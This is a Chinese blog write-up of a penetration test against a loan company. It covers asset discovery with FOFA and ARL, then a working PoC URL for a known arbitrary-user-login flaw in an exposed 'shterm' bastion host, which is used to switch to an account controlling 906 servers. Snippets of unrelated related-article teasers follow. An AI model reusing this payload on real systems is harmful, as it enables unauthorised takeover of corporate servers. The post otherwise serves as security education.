记一次某贷款公司从0到100的渗透测试记录

VSole2022-01-24 15:44:52

前言

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。漏洞测试结束后已将漏洞提交漏洞平台。

信息收集

首先通过爱企查找到某某贷款公司,查看备案域名,进行子域名收集,以及fofa收集。


图1-1 爱企查备案站点收集

将发现的域名可通过灯塔以及fofa进行收集,备案号也可进行收集遍历后面的号数。

域名fofa语法:domain=xxx.com
备案号fofa语法:body=xxICP备xxxx号-x

图1-2 1-3 为fofa资产收集

灯塔收集:

图1-4 资产灯塔系统资产收集

这里推介使用灯塔进行收集,因为很多小的收集工具已经集成在灯塔里了,我们就不需要在去挨个下了,但是如果对方是有waf秒封的ip的话还是推介人工收集,方法就以上几种不多说了。

漏洞发现

此时我们可以将收集的资产先放扫描器过一遍,扫描器扫的同时我们就手工测试对方系统的逻辑漏洞、cms漏洞、反序列化漏洞等等。

这里呢我推介大家使用一个谷歌插件Wappalyzer,此插件的好处可以识别对方使用的cms系统以及用的编程语言、中间件、操作系统等,这样不仅免去了我们手工测试的麻烦还可以第一时间通过得到的上述信息精准打击。

图2-1 Wappalyzer网站技术分析插件

通过收集和扫描将近三四个小时的努力发现了对方将堡垒机映射出外网,且该堡垒机在2021年4月通报过一个高危漏洞:任意用户登录,通过poc探测对方存在此漏洞。

https://xxx.xxx.com:6443/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm

图2-2 poc测试图

漏洞利用

首先通过poc测试的漏洞来进行查看用户以及切换切换用户。


图3-1 会话审计图

通过会话发现对方近期都有登录过堡垒机里的机器,此时尝试将审计用户切换为配置管理员查看对方的哪一个用户掌管机器的。

图3-2 配置用户关联设备

通过图3-2知道了大量设备都于sys这个用户有关联,因此我们直接切换该用户进行查看。

https://xxx.xxx.com:6443/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=sys

图 3-3 sys普通用户权限图

通过3-3可知已将对方打穿,可管控服务器906台,至此渗透结束。

结束语

本文章主要讲解了从信息收集到漏洞发现以及利用的全过程,其实漏洞不止这一个但是此漏洞具有代表性,感谢各位师傅观看!

堡垒机渗透测试
本作品采用《CC 协议》,转载必须注明作者和本文链接
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。漏洞测试结束后已将漏洞提交漏洞平台。
F-vuln(全称:Find-Vulnerability)是为了自己工作方便专门编写的一款自动化工具,主要适用于日常安全服务、渗透测试人员和RedTeam红队人员,它集合的功能包括:存活IP探测、开放端口探测、web服务探测、web漏洞扫描、smb爆破、ssh爆破、ftp爆破、mssql爆破等其他数据库爆破工作以及大量web漏洞检测模块。
通过实战化演练,可针对性地查漏补缺,梳理企业可能面临的各类网络安全威胁场景,不断积累应对方法、处置手段,促进企业防守能力的持续提升。
“密码作为基础设施,是北京冬奥第一个上线的安全专项,也先于所有的信息系统上线。”
12月6日,国内安全行业门户FreeBuf旗下FreeBuf咨询正式发布《CCSIP 2021中国网络安全产业全景图》(第三版)。安恒信息成功入围数据安全、云安全、应用防护、身份识别与访问管理、边界访问控制、安全服务、威胁检测与捕获、漏洞检测与管理、安全情报、事件管理&响应、调查取证、物联网安全、工控安全等13个安全模块,分布于31个细分领域。
基于“动态安全”体系架构设计,构筑“网络+安全”稳固防线“等级保护解决方案”,基于“动态安全”架构,将网络与安全进行融合,以合规为基础,面对用户合规和实际遇到的安全挑战,将场景化安全理念融入其中,为用户提供“一站式”的安全进化。
生产环境资产对外服务资产是红队密切的关注点。对于安全设备所覆盖范围进行有效排查,尽可能做到无死角全覆盖。管理员应全面检查系统、数据库、对外服务相关权限设置,以确保最小权限原则,过期的授权应予以删除。对于大中型企业的资产较多,端口管控较为困难,红队通过对端口发起有效入侵是最直接、最有效的途径之一。为了更加安全,以防红队人员探测到web服务,也可
蓝队初级防护总结
2023-01-09 10:11:55
三. 网站被上传webshell如何处理?工具方面比如使用D盾webshellkill,河马webshell查杀,百度在线webshell查杀等工具对网站目录进行排查查杀,如果是在护网期间可以将样本备份再进行查杀。堡垒是针对内部运维人员的运维安全审计系统。WAFWAF是以网站或应用系统为核心的安全产品,通过对HTTP或HTTPS的Web攻击行为进行分析并拦截,有效的降低网站安全风险。
安服工程师技能手册详细总结
VSole
网络安全专家